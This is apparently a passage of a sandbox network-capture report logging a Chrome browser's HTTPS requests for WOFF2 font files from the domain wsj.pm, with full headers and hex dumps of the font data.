                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Thu, 11 Jan 2024 16:42:37 GMT
                                                                                                                ETag: "bec0-60eae3c2dd940"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 48832
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 be c0 00 12 00 00 00 02 58 9c 00 00 bd 95 00 01 00 00 00 00 bd fc 00 00 00 c4 00 00 01 f0 00 00 00 00 00 00 00 00 19 3a 1a 81 62 1b 81 bd 3c 1c ad 5c 06 60 00 93 00 08 78 09 9a 16 11 08 0a 86 ab 78 85 f3 3b 01 36 02 24 03 97 6e 0b 8b 7a 00 04 20 05 8f 30 07 b1 0c 0c 81 23 5b 2b 35 92 0a 85 c7 ee 3f 64 90 d5 9a a9 b2 73 b4 ed 17 e4 50 d2 17 b9 40 75 4b cf 54 6f 2a b0 e0 af fb 7b 9f 1a 99 d7 12 77 d0 1d 88 77 b0 7a 0d 9d fd ff ff ff ff ff ff ab 92 1f 32 b6 bf 7b c3 77 c7 36 36 10 b5 40 b0 54 7f 69 99 5f 08 69 8e 5a b1 98 2c a7 2e e5 ae d4 3e 26 e6 44 ed 3e a4 ad 8a 92 c6 dd b0 97 72 d0 c3 28 45 de 54 dd ab f7 be 39 36 fe 36 75 a8 cb 7b ef dc 64 9a a3 c7 81 72 8c 0b 21 21 09 c9 d0 5a 32 58 eb e9 43 bf 89 2f f9 43 da 2c 51 0a 62
                                                                                                                Data Ascii: wOF2X:b<\`xx;6$nz 0#[+5?dsP@uKTo*{wwz2{w66@Ti_iZ,.>&D>r(ET966u{dr!!Z2XC/C,Qb
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: b6 a0 c1 13 11 fe 50 f2 14 e2 91 ae 0d a1 45 23 19 5b b9 6f ca d5 f8 a4 b7 f9 66 99 fa e5 04 d5 3c 2c f5 93 7f 4d c3 c3 68 d7 7a e4 b8 f0 89 f9 35 10 e7 f3 32 e3 1e a7 19 1d da 1a 63 84 70 98 9a ea 62 65 64 95 e3 62 43 0e 3a 93 3e 52 fe a8 0b 0e 80 c1 fd 1c be f7 22 c3 d3 b6 8d f2 5f 33 c4 b6 5c 8f e0 08 bb ba 40 c7 1b 6f 8d 01 a4 50 91 23 66 3f 9c 0a e0 ba 3a 72 a5 69 b6 2e 9e 78 14 d6 22 e3 a2 58 93 31 e2 11 d4 86 e8 6c c3 b5 0c ed 9a 9b 18 6d 8f db e4 bc b8 5f c6 92 c0 87 70 44 cd cb 50 8f 09 f1 06 92 46 a2 47 6d b1 33 b4 a5 07 da 87 55 38 76 1c 73 7b 8b d0 e0 bf fe 34 54 66 d1 4f d7 fe fd 24 3f 95 b4 63 bb f6 6d fa 6e 2a bd 9c d1 6d b3 e6 fd 90 71 cc a7 c1 a7 41 9f 4b 4f 03 6d 0b da bc df ca 62 40 bc 8e ec ac 3b fa 3c c2 3a bf 2c 67 98 cb e8 99 b7 1d
                                                                                                                Data Ascii: PE#[of<,Mhz52cpbedbC:>R"_3\@oP#f?:ri.x"X1lm_pDPFGm3U8vs{4TfO$?cmn*mqAKOmb@;<:,g
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 5f b5 27 01 67 1a 1e bd 43 f6 4f 48 90 ee da 05 e5 28 bb 37 a3 bc 91 7a 4b 9a c8 c7 00 4d 3b bf e7 b4 fd fa 5d 9c db e9 08 43 2b b0 e9 ed 04 7e 70 89 a7 1c 33 c3 3b 45 a2 1e 68 26 0f f5 db da 96 46 ba 27 41 91 a4 84 88 03 44 cd 47 4b 42 15 8b 74 a1 2a 02 61 16 5c 29 48 ae 35 df d1 7d ea 8c 22 11 e4 21 c3 8a dd c3 16 aa 7c 5b 77 23 aa 58 b3 73 3b 53 36 6e fa 3c b5 77 7a 16 88 d7 40 4e d8 17 68 ec 74 2f a0 0f a6 1d ea 08 90 86 dc 70 bf 19 8b 59 c8 60 de 92 e5 38 19 81 4a 0f b4 b9 96 97 5a 21 94 5a 4c 9c 4a 50 0b 51 2f 64 b5 00 cc c1 8b 73 c3 70 9e 4d d8 23 a4 23 0d 29 bb a3 7a 97 54 f9 2b d8 b6 93 65 c4 5b 8b 11 ed f5 c3 a2 e6 68 05 bf 1e ca a6 3d 21 d5 1d 0c 00 1f 17 1a 12 91 8c 24 24 6c e5 63 11 c2 79 96 5e 8b 51 f1 d5 b8 70 71 24 40 01 0a 0b c4 a1 9c 08
                                                                                                                Data Ascii: _'gCOH(7zKM;]C+~p3;Eh&F'ADGKBt*a\)H5}"!|[w#Xs;S6n<wz@Nht/pY`8JZ!ZLJPQ/dspM##)zT+e[h=!$$lcy^Qpq$@
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 37 63 2e 1e 7b 54 a2 88 52 65 a8 d8 34 19 d7 55 ca e6 b9 e7 d6 d4 e4 86 86 1e 70 5b 9e 3b 94 9d 9c df 52 9a 97 5c 2f b5 1b c8 c9 1d f4 85 64 f0 45 3f a5 39 6c d5 f8 b7 48 d7 d2 d8 e8 83 01 1b ed f6 86 e0 98 58 17 17 a9 0c 85 34 07 fe 04 bb e2 19 f4 fd 2f b3 36 3a 49 92 5b 5a 79 0e 14 49 fc 86 48 bc bd 78 c1 6c df cf 1b 36 cd b8 e2 27 4b 2d f7 13 77 60 ec 8f f8 fd b9 01 c9 df d9 51 d0 81 ae 3a b1 a4 7a 09 7a c7 56 7d 71 12 af 98 20 d9 da 58 2c 8e 2a 76 6c 2c 16 89 8b 29 61 81 49 fa e2 51 cc 15 a5 3d 11 cd c5 6c ee 6c c7 39 52 02 a5 52 45 6c a9 26 b6 94 40 d9 2e 93 4d f8 fe 08 2d 6a f6 23 9b 17 c4 0f a7 d1 78 9c 60 5e b6 a9 6f 60 9a 95 cb f8 31 e2 01 0c f8 ce f4 90 da 1c 64 7b 76 c6 b3 9d a1 b6 32 bc b1 2d c2 38 82 50 32 6d f9 32 02 0d 1b c9 cf c9 07 50 8a
                                                                                                                Data Ascii: 7c.{TRe4Up[;R\/dE?9lHX4/6:I[ZyIHxl6'K-w`Q:zzV}q X,*vl,)aIQ=ll9RREl&@.M-j#x`^o`1d{v2-8P2m2P
                                                                                                                2024-04-25 14:58:18 UTC8000INData Raw: 60 c4 bf 15 20 af 14 7d 57 d3 8d 5b b2 e5 79 c2 5c d0 6c 91 d0 61 15 c8 d0 0b 2f 9b 05 17 6c fd 1a 1a a1 c4 20 61 60 b9 8a e8 2b c5 de 90 6c 4e 1e ca 97 84 79 d8 77 e5 95 7b 67 09 74 8a 52 f6 43 ac 86 ec eb de d6 c2 59 17 3d f2 c3 07 7b e9 43 e9 aa ba eb 2f a4 a4 14 29 3b 83 7f 05 3e 7e 25 c5 c5 1f e5 9d 3c 04 53 54 a1 dd 4d 19 77 e1 26 f3 aa 3f c5 46 3d ed 98 34 8f 9c 45 6e 30 0c f8 88 fd 32 1a 95 3e 98 40 a7 8b f2 4f d7 42 99 02 85 ad bf 58 4b 46 8b c6 d2 c2 7a 18 17 91 6c d4 57 5b 5e 6a e5 82 ec fc 22 84 b0 de 20 c2 d7 3a 68 2e ca 2b 40 c1 64 67 80 c1 45 ac 85 08 08 21 6f 86 56 d0 5b d2 76 84 1e fc 2e 0a 02 9b 4a 5f 34 b9 a5 d4 b7 94 df 55 47 c0 2d 7c 75 ef 72 2b 27 d2 56 df bd c5 bc 19 dc 7c 61 c4 1c f5 92 c6 03 f1 b9 c9 c9 8f 86 96 85 1e c5 41 6e 76
                                                                                                                Data Ascii: ` }W[y\la/l a`+lNyw{gtRCY={C/);>~%<STMw&?F=4En02>@OBXKFzlW[^j" :h.+@dgE!oV[v.J_4UG-|ur+'V|aAnv
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 09 ee 28 01 4d 00 77 3e 04 1a 00 3e cf 7f a7 c0 c6 15 8e 72 b3 2b 92 e8 d9 c8 e6 2d 27 69 2f 40 1e e0 c7 5a da 75 4f 14 b5 d3 74 4b 56 0a 8a 55 c7 33 87 44 df b2 5f db 52 2e 0f 93 e3 3c 65 eb 4c 1f 0d c4 7f f5 03 f7 48 07 d6 56 67 04 71 4c e5 01 99 76 03 69 8e d3 30 da 26 ba 96 3d 6e 75 62 83 00 f0 c4 20 19 55 39 66 11 01 ea 4c 93 bd 6c 5a 10 66 bf 18 a2 49 5a 6e 5f 51 50 78 61 7a 4f 40 42 7c 59 ba 5d 4e df 8a 51 43 62 e8 9e 1a 4e 51 4a 9f ba c4 39 c5 88 a0 83 b9 24 8c a6 63 9c ca a4 de 74 51 a2 9c f1 c3 8b ca 97 60 52 95 73 f6 13 58 57 4c b0 8c 30 33 b3 76 94 20 94 ec 17 3d 25 78 4e a4 c5 a8 ef 6c c9 27 30 61 27 7f 1e 21 4d 9e 0e d3 35 79 d7 d1 4f 5d 92 d4 36 29 08 08 74 06 12 4f d1 4a 9f b9 84 81 79 05 58 23 7c 89 87 eb 6b 9a 7a 24 c6 54 36 a8 2f 90 65
                                                                                                                Data Ascii: (Mw>>r+-'i/@ZuOtKVU3D_R.<eLHVgqLvi0&=nub U9fLlZfIZn_QPxazO@B|Y]NQCbNQJ9$ctQ`RsXWL03v =%xNl'0a'!M5yO]6)tOJyX#|kz$T6/e
                                                                                                                2024-04-25 14:58:19 UTC892INData Raw: af e3 95 b8 16 7f 10 ad 93 a7 6c 80 4d 81 dc 26 54 15 ce 5b 51 50 2c d4 95 66 fd 6b 09 db ce e3 cf 90 b6 ed 2b 57 b1 94 e2 09 b1 31 4e 74 91 a3 30 60 b0 d0 91 4a c0 ce 11 fd 22 3e 47 cf 02 c4 6f 15 61 87 e4 ef 46 63 67 40 44 87 11 f6 20 26 37 9b 1e e6 c2 2e 81 20 87 a6 6c 04 a3 7e 55 1a 98 0a de 2a 90 5d 5f 97 ec 44 22 0b 25 be 83 44 e6 e3 ae b8 27 6b 71 6f e9 89 f7 29 6a 55 78 14 ef a4 0b bc 71 53 50 5e 79 f5 4a a7 bc 63 df cd 2b b2 81 f7 84 ed ca 5d 6a 15 fd 83 31 0a d5 e5 11 ad 78 d2 83 f3 33 69 87 48 11 f1 20 86 0c db 22 1e bd 05 41 a3 f0 38 e6 24 5e f2 7c 00 c2 10 28 4c c6 01 ba 81 43 26 6e f6 53 c8 03 9e 08 23 67 02 4c 97 01 89 04 3e cb 60 8b 2d 89 28 c3 3e 83 1d 21 8c 45 24 9f 92 1b cf e7 32 09 ce bb 6e 87 25 e0 36 eb ce 61 06 8a 05 e4 1d 88 27 13
                                                                                                                Data Ascii: lM&T[QP,fk+W1Nt0`J">GoaFcg@D &7. l~U*]_D"%D'kqo)jUxqSP^yJc+]j1x3iH "A8$^|(LC&nS#gL>`-(>!E$2n%6a'


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                10192.168.2.1749728103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC570OUTGET /fonts/woffs/escrow/Escrow+Display+Condensed+Bold.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "68dc-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 26844
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 68 dc 00 10 00 00 00 00 e1 58 00 00 68 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b df 48 1c 84 0c 06 60 00 86 12 08 3c 09 97 62 11 08 0a 82 a5 00 81 fb 36 01 36 02 24 03 87 2e 0b 83 5a 00 04 20 05 87 0b 07 84 37 0c 81 0d 1b 98 c9 77 d0 6d db 13 0b 08 2c bd 59 65 9d ec c7 73 a7 1e 89 d0 ed a8 94 6d e0 f8 6c 44 04 1b 87 99 03 fe c2 d9 ff ff ff 7f 56 d2 31 86 0c 6d 80 9a a5 59 f5 0b 0d 29 46 53 dc c5 1c c2 a1 94 c0 1a 21 6d ef 01 fd 88 bd 14 a8 71 82 8f d9 3a ed 2a b2 8a 14 36 31 cb bd a8 57 22 fd 96 19 52 4e 58 4d 7b 0c 66 3f 60 89 8b 5f e0 b2 a4 4a a7 3f 7d 62 84 0c b1 b4 f0 5d a1 52 57 92 65 2b 59 76 ed 24 a9 18 1e c8 ed bd 3d e9 c1 21 43 f7 ad 9c 2f e5 c3 af fd a4 e0 d1 9a 66 d5 a4 69 ac db
                                                                                                                Data Ascii: wOF2hXhzH`<b66$.Z 7wm,YesmlDV1mY)FS!mq:*61W"RNXM{f?`_J?}b]RWe+Yv$=!C/fi
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 2c f7 62 96 3d af 67 9f 63 a4 2a 1a a6 02 32 e3 6c e5 97 88 34 18 e5 1d f1 80 8c 34 7d 79 2a fe fc 41 04 f8 b2 73 95 93 4c 58 0d 46 90 32 5a 92 ea 86 98 4e 81 34 2b 08 c3 f3 45 62 6a 43 11 4d 87 68 3c 38 15 ad ed 6b 7b 44 e2 2e 1e 84 a2 7b 5e 9f d1 7c b5 b3 d7 f3 9d 48 c1 41 74 90 c2 84 37 35 4e 1d b6 9b 0a bc 71 5f 09 2e 13 c2 fa 17 25 70 75 26 3c b7 26 58 40 b2 de 72 18 c6 c0 93 f9 3a 52 d0 86 b2 ad c9 02 ab 0e 4f c0 41 46 55 09 73 62 aa 79 ab 6d 07 67 a0 0a 81 ad 37 93 84 36 f3 f4 4d 1e 24 74 dc ec 22 29 71 77 6b fb a2 81 e5 3d e3 a4 64 be 64 5f 97 70 43 29 40 61 13 df a7 27 96 6b 9a e8 9c ca 1e be 0c 1c 76 4d 07 9f 03 5a ef 4a 39 fa 71 1a c7 d8 d9 8c f3 fe b1 84 45 fc 2b 5c 68 1a 18 54 67 96 07 bd 34 a5 11 c4 f0 fd dc e8 96 18 d9 a9 f7 ee c1 24 65 14
                                                                                                                Data Ascii: ,b=gc*2l44}y*AsLXF2ZN4+EbjCMh<8k{D.{^|HAt75Nq_.%pu&<&X@r:ROAFUsbymg76M$t")qwk=dd_pC)@a'kvMZJ9qE+\hTg4$e
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: e9 a2 17 be 12 54 67 45 ad 2d 93 5a aa d1 6a 99 7e 0c 2c f9 d5 12 6f cc ba e7 8c 35 99 bf c4 13 d9 07 58 20 b4 03 ef 32 26 f3 d8 9d 89 27 68 af 58 07 41 26 b4 0d 3f 99 5e c2 81 0e e1 a3 9f 51 f9 6b a7 54 be f8 0d 7a 0c 8d 7e 7f d5 77 d2 7b f4 e1 39 17 34 1d 1a a5 7e 18 f7 79 67 c2 ce 7d 55 7b 2d d0 05 88 73 e4 50 e2 e1 94 bd bf ce 7d 00 4d 85 96 37 74 4e af e0 8e d0 d5 ea b8 f3 27 97 df bd 0f 75 41 87 67 37 3b fe aa 8d 2b 36 a5 25 ea 2d d0 6c e8 c1 ec 72 57 c5 f0 7d 1f 03 cb a0 47 90 bc f1 df d4 21 29 45 65 47 b6 43 ab a0 d7 56 86 f6 21 50 bf bd 0e a8 6a 39 9d dc 04 fd 03 4d af d3 9c 48 86 57 4e 1b 7d f3 3e f4 00 da d6 7a 12 58 0c 79 bf 03 ea 4f ff 52 d4 05 cd 84 96 0b 3a 97 4d 51 56 a5 a5 1a e5 d5 5a dd 0b 29 e7 83 80 f1 57 f8 1d 42 44 2b 9d ff ca 32 ba
                                                                                                                Data Ascii: TgE-Zj~,o5X 2&'hXA&?^QkTz~w{94~yg}U{-sP}M7tN'uAg7;+6%-lrW}G!)EeGCV!Pj9MHWN}>zXyOR:MQVZ)WBD+2
                                                                                                                2024-04-25 14:58:19 UTC2904INData Raw: 2c 6e 47 ad be ae ce 88 e9 7e 32 29 62 07 e5 75 9a 70 65 75 1c 79 d9 06 9c b5 ed ec 0c 26 fa 13 cf 65 9e ab 37 37 5c 94 d7 42 e1 e2 d1 9e 23 2c 64 37 68 00 97 a0 f1 8b 46 3d d5 5c 81 96 11 00 10 8c 18 73 fe 83 02 d4 84 d4 06 be 37 47 94 4d 2c 13 80 78 5b 27 53 4c 28 52 a5 54 aa d7 14 38 0e 9e af 4a d6 fc a5 13 07 ae fc b8 5e 06 0d 20 58 47 c3 bb 99 9c d4 2c 1b 30 85 c2 59 34 21 2a bb 6a 11 2c f7 05 b0 a2 28 97 4e d1 ff 6f 65 f0 f7 52 0e a5 d5 9e d6 48 b0 f1 b3 4b 0f 40 4a 42 a6 f0 38 20 b2 1f 12 54 89 a3 ed bf df 2a ef 2d b3 f1 c3 9d d1 20 93 19 65 1d ef 36 46 19 8f 47 ba 71 40 8a 79 da 41 ad 8c 74 61 3a a8 6c 82 73 3f 81 d8 e0 72 bf be 5a 61 dc 69 d8 d9 e0 6e 1c da b9 9b 55 28 8d e4 fb 3c 3b b6 ca f2 da 64 5e a1 3a b4 26 57 16 f9 35 11 e3 1e 7c db a3 a9
                                                                                                                Data Ascii: ,nG~2)bupeuy&e77\B#,d7hF=\s7GM,x['SL(RT8J^ XG,0Y4!*j,(NoeRHK@JB8 T*- e6FGq@yAta:ls?rZainU(<;d^:&W5|


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                11192.168.2.1749729103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC571OUTGET /fonts/woffs/escrow/Escrow+Display+Condensed+Roman.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:18 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:18 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "6488-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 25736
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:18 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 64 88 00 10 00 00 00 00 e1 bc 00 00 64 27 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b d4 70 1c 84 0c 06 60 00 86 12 08 3c 09 97 62 11 08 0a 82 b0 24 82 86 70 01 36 02 24 03 87 2e 0b 83 5a 00 04 20 05 87 23 07 84 37 0c 81 0d 1b 12 ca 17 d8 36 2d 78 66 b7 03 e0 eb db ff 08 b3 03 b5 c7 41 dc 80 17 4c 01 e7 c4 7a 6e 17 fe f4 33 b7 33 fb ff ff bc a3 43 c6 60 ff 00 d0 5f 55 ab 4a 45 02 23 72 13 8f 90 0c 65 52 8b b8 8a 58 63 a4 b2 99 16 db 5e 96 a9 dc 72 3b 5c 2c ea f4 10 0e 31 03 24 a6 10 99 19 a4 10 9c 69 4e 14 76 d5 aa 36 2f 82 1b bf 9a 49 48 42 36 65 c3 7b dc 3d e3 84 ec 92 e8 f3 fd 48 69 93 45 a8 5d 53 b1 61 17 bf 02 df 9d 0c 2f fd 7e ec fd 6f 7b 34 4f b6 52 53 f3 a1 b0 4f 35 6e 6a 0e 0a f5 1e 94
                                                                                                                Data Ascii: wOF2dd'p`<b$p6$.Z #76-xfALzn33C`_UJE#reRXc^r;\,1$iNv6/IHB6e{=HiE]Sa/~o{4ORSO5nj
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: a0 e8 d7 7d 5b 87 07 af 7d d3 86 6e e6 d5 61 01 df 15 b8 3e d8 7f 15 90 28 18 07 ad 1f 64 c9 25 3f 8a fb 5c 7b d3 6c a5 3f f0 8b c6 7b c5 63 78 71 0b 44 48 cd 96 9b 9e 26 24 8f 0e 0d 3f ec 49 b1 16 77 6a cd 02 11 f8 6d 8e 59 33 8d 15 72 7b c7 7b bb 0d 8f 06 7a 9c ec 26 a6 71 83 96 4a db d1 d9 1e 9a 59 b2 0f 1b 74 55 77 50 33 7c c0 ae 9a 84 d1 80 65 72 b2 da 2d 7f 36 44 77 22 12 ba 4d 7f 5f 7f 89 e0 a8 f3 af c0 09 bb 5b 43 c9 f5 82 7c e0 53 e6 dd 5b 0a a4 fd f3 7f ba 8f ab 88 7c c9 04 6b e4 76 bb 2b 29 24 b3 a0 b6 32 1c 9d 52 e3 ab df 01 c1 26 58 f6 03 fe 95 3d 55 c8 5a 81 a3 63 0c 0f 70 6c 40 40 a2 80 eb 75 f5 d7 74 12 87 f4 5e 66 d5 92 cb f9 26 e6 1f 14 38 d5 a9 5f 4f 98 79 9f 8b 04 be c9 6b 9c ad fa 91 be cb 4b ac e2 ba 0e f9 47 76 30 5e fb 0f da 8b 1b
                                                                                                                Data Ascii: }[}na>(d%?\{l?{cxqDH&$?IwjmY3r{{z&qJYtUwP3|er-6Dw"M_[C|S[|kv+)$2R&X=UZcpl@@ut^f&8_OykKGv0^
                                                                                                                2024-04-25 14:58:19 UTC8000INData Raw: 62 90 a0 fa 8e 90 f3 69 ca d3 48 ec c6 66 d2 42 ea b1 21 99 3a 55 5c 75 b5 18 e7 1c b9 55 a2 e3 6e cb 46 37 74 d2 09 40 01 29 02 67 c1 84 b7 a0 3e 8e ef 2f d2 5a 9e 51 5a 2e c6 dc 63 e2 31 32 2c 9a 5c c0 22 ff ce 68 a5 d3 cf 72 af 30 07 8e 0f d1 07 a4 5d 77 5e 1f 48 c7 30 00 f2 37 d2 76 08 43 ef a6 63 a0 35 e4 97 f9 2c 72 05 70 13 3a 2d c1 79 15 ef d8 30 b9 6a ce 4d 36 fb 9b 94 f3 5d 22 b9 b5 94 cd 79 ce 66 df dc c0 ad 75 bc 90 3d b8 0f cd 7c 94 95 fd 45 c1 6a 75 0a 89 d0 55 ae 0d 39 d7 31 ad 22 14 a0 7b 1e bc 28 ef 37 36 1f 79 1a e1 e6 39 fa 0f 06 bb 22 bb f7 91 af c1 33 cb af d0 39 67 97 33 bc 83 4b bd 10 18 3b 78 7a c2 f0 68 c7 ec b2 1d c4 70 70 ac b6 a8 24 82 d6 b7 20 e2 9d 76 6f 14 b7 cb 72 ae 06 88 b6 c9 75 7c ab 26 f0 9b 6c fa f2 73 69 e6 52 fe 52
                                                                                                                Data Ascii: biHfB!:U\uUnF7t@)g>/ZQZ.c12,\"hr0]w^H07vCc5,rp:-y0jM6]"yfu=|EjuU91"{(76y9"39g3K;xzhpp$ voru|&lsiRR
                                                                                                                2024-04-25 14:58:19 UTC1796INData Raw: bb db d8 6f 16 fd 85 e6 17 05 04 a0 93 2b 2e 79 ca 39 7b d6 2c 71 84 26 6f bd f0 cc 2d 37 9d 71 ca 31 47 1d 71 c8 41 06 3b 6c d7 a8 c1 26 1b ac b7 d6 0a cb 2d b5 58 a9 12 e9 52 4d 30 de 28 23 c5 8a 11 29 42 b8 50 21 82 f8 f1 91 2c 51 1c 2b 0d 15 19 09 aa 16 22 f1 70 71 b0 10 30 00 f5 90 7a 56 18 c4 ff 52 f1 e7 8a 5f 22 0a c4 a3 4c e0 1e 7e bc 1e 28 f6 a9 7b 03 31 89 c8 9c 43 28 22 3a 04 17 a5 01 c2 21 f4 ab 68 a7 b5 d6 a8 e4 60 90 e3 20 21 0a f2 58 61 93 7a 38 25 23 cb 21 7c ca 50 20 18 01 1e 84 84 b1 81 98 21 b1 20 00 3c 3c 35 ea 11 74 ce 10 09 15 1d 55 8a a1 12 65 8f ec ea 88 89 3f 1e 70 a6 22 37 f3 0b 84 f5 e0 7f 34 e4 5d 33 ba 5e 91 cc e9 0f 3b dd 86 57 ce f7 ab 21 aa 51 91 44 9d 9c 36 96 d5 d8 69 4a 7c af 4e de 1e c3 b7 71 eb 8a c5 80 e4 16 a7 13 93
                                                                                                                Data Ascii: o+.y9{,q&o-7q1GqA;l&-XRM0(#)BP!,Q+"pq0zVR_"L~({1C(":!h` !Xaz8%#!|P ! <<5tUe?p"74]3^;W!QD6iJ|Nq


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                12192.168.2.1749730103.113.70.374436544C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-04-25 14:58:18 UTC572OUTGET /fonts/woffs/escrow/Escrow+Display+Condensed+Italic.woff2 HTTP/1.1
                                                                                                                Host: wsj.pm
                                                                                                                Connection: keep-alive
                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                Origin: https://wsj.pm
                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                Accept: */*
                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                Sec-Fetch-Dest: font
                                                                                                                Referer: https://wsj.pm/
                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                2024-04-25 14:58:19 UTC252INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 25 Apr 2024 14:58:19 GMT
                                                                                                                Server: Apache/2.4.52 (Ubuntu)
                                                                                                                Last-Modified: Fri, 08 Jul 2022 15:09:11 GMT
                                                                                                                ETag: "64e0-5e34c95a213c0"
                                                                                                                Accept-Ranges: bytes
                                                                                                                Content-Length: 25824
                                                                                                                Connection: close
                                                                                                                Content-Type: font/woff2
                                                                                                                2024-04-25 14:58:19 UTC7940INData Raw: 77 4f 46 32 00 01 00 00 00 00 64 e0 00 10 00 00 00 00 de 90 00 00 64 7e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b c1 1a 1c 84 48 06 60 00 86 12 08 3c 09 97 62 11 08 0a 82 bd 18 82 8f 5e 01 36 02 24 03 87 2e 0b 83 5a 00 04 20 05 87 0b 07 84 46 0c 81 0d 1b dd c4 07 d0 db 76 24 dc 0e 20 7c 4f d7 c0 91 81 60 e3 e0 0d 3f 88 d3 23 03 c1 c6 01 31 86 ef 73 d9 ff ff 99 49 45 c6 6c 32 4c db 8e a1 e0 94 ab 5e 90 b9 c9 43 6e 21 88 40 cf 80 a8 ac ea dd aa e7 3a 7a b7 ad 8f ad ac 2c af 63 b3 ca ce 7a 9a 13 89 4a cb ad a2 2e ae ab cc f1 46 77 be d3 14 75 51 89 aa e9 60 3b a4 ee 8b 38 4c 12 f0 10 4e 94 16 39 ea 69 93 f8 69 7f 98 28 38 1d 5d 90 51 16 c4 21 da 4f e1 8b ea 82 df e3 70 74 3c 88 e8 5b 74 a2 98 cc 97 59 e1 43 04 5f e1 d7 ff dd
                                                                                                                Data Ascii: wOF2dd~H`<b^6$.Z Fv$ |O`?#1sIEl2L^Cn!@:z,czJ.FwuQ`;8LN9ii(8]Q!Opt<[tYC_
